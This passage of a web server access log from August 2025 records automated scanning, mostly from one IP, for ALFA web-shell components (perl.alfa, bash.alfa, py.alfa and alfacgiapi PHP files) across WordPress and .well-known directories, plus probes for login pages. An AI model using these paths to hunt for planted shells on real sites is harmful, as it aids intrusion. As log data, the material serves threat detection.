"Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:21 -0400] "POST /wp-content/plugins/library/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 286 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:21 -0400] "GET /wp-content/plugins/library/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 303 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:21 -0400] "GET /wp-content/plugins/library/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 303 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:21 -0400] "GET /wp-content/plugins/library/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:26 -0400] "POST /wp-admin/alfacgiapi/perl.alfa HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:26 -0400] "POST /wp-admin/alfacgiapi/perl.alfa HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:26 -0400] "POST /wp-admin/alfacgiapi/bash.alfa HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:27 -0400] "POST /wp-admin/alfacgiapi/bash.alfa HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:27 -0400] "POST /wp-admin/alfacgiapi/py.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:27 -0400] "POST /wp-admin/alfacgiapi/py.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:27 -0400] "GET /wp-admin/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:27 -0400] "GET /wp-admin/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:27 -0400] "GET /wp-admin/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:40 -0400] "POST /wp-admin/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:40 -0400] "POST /wp-admin/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:41 -0400] "POST /wp-admin/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:41 -0400] "POST /wp-admin/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:41 -0400] "POST /wp-admin/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:41 -0400] "POST /wp-admin/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:41 -0400] "GET /wp-admin/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:41 -0400] "GET /wp-admin/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:42 -0400] "GET /wp-admin/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:49 -0400] "POST /wp-includes/alfacgiapi/perl.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:50 -0400] "POST /wp-includes/alfacgiapi/perl.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:50 -0400] "POST /wp-includes/alfacgiapi/bash.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:50 -0400] "POST /wp-includes/alfacgiapi/bash.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:50 -0400] "POST /wp-includes/alfacgiapi/py.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:50 -0400] "POST /wp-includes/alfacgiapi/py.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:50 -0400] "GET /wp-includes/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:51 -0400] "GET /wp-includes/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:51 -0400] "GET /wp-includes/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:17 -0400] "POST /wp-includes/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:17 -0400] "POST /wp-includes/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:17 -0400] "POST /wp-includes/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:18 -0400] "POST /wp-includes/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:18 -0400] "POST /wp-includes/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:18 -0400] "POST /wp-includes/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:02:18 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:18 -0400] "GET /wp-includes/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:18 -0400] "GET /wp-includes/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:19 -0400] "GET /wp-includes/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 286 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 209.38.125.40 - - [12/Aug/2025:12:02:20 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:12:02:20 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:12:02:20 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:12:02:21 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 128.199.106.124 - - [12/Aug/2025:12:02:21 -0400] "POST /.well-known/alfacgiapi/perl.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:21 -0400] "POST /.well-known/alfacgiapi/perl.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:21 -0400] "POST /.well-known/alfacgiapi/bash.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:21 -0400] "POST /.well-known/alfacgiapi/bash.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:22 -0400] "POST /.well-known/alfacgiapi/py.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:22 -0400] "POST /.well-known/alfacgiapi/py.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:22 -0400] "GET /.well-known/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:22 -0400] "GET /.well-known/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:22 -0400] "GET /.well-known/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:31 -0400] "POST /.well-known/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:31 -0400] "POST /.well-known/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:31 -0400] "POST /.well-known/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:31 -0400] "POST /.well-known/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:31 -0400] "POST /.well-known/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:32 -0400] "POST /.well-known/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:32 -0400] "GET /.well-known/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:32 -0400] "GET /.well-known/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:32 -0400] "GET /.well-known/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 286 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:36 -0400] "POST /.well-known/acme-challenge/alfacgiapi/perl.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:36 -0400] "POST /.well-known/acme-challenge/alfacgiapi/perl.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:36 -0400] "POST /.well-known/acme-challenge/alfacgiapi/bash.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:36 -0400] "POST /.well-known/acme-challenge/alfacgiapi/bash.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:36 -0400] "POST /.well-known/acme-challenge/alfacgiapi/py.alfa HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:37 -0400] "POST /.well-known/acme-challenge/alfacgiapi/py.alfa HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:37 -0400] "GET /.well-known/acme-challenge/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 293 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:37 -0400] "GET /.well-known/acme-challenge/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 293 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:37 -0400] "GET /.well-known/acme-challenge/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 291 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:43 -0400] "POST /.well-known/acme-challenge/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:43 -0400] "POST /.well-known/acme-challenge/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:44 -0400] "POST /.well-known/acme-challenge/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:44 -0400] "POST /.well-known/acme-challenge/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:44 -0400] "POST /.well-known/acme-challenge/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 286 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:44 -0400] "POST /.well-known/acme-challenge/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 286 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:44 -0400] "GET /.well-known/acme-challenge/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 303 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:44 -0400] "GET /.well-known/acme-challenge/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 303 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:44 -0400] "GET /.well-known/acme-challenge/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 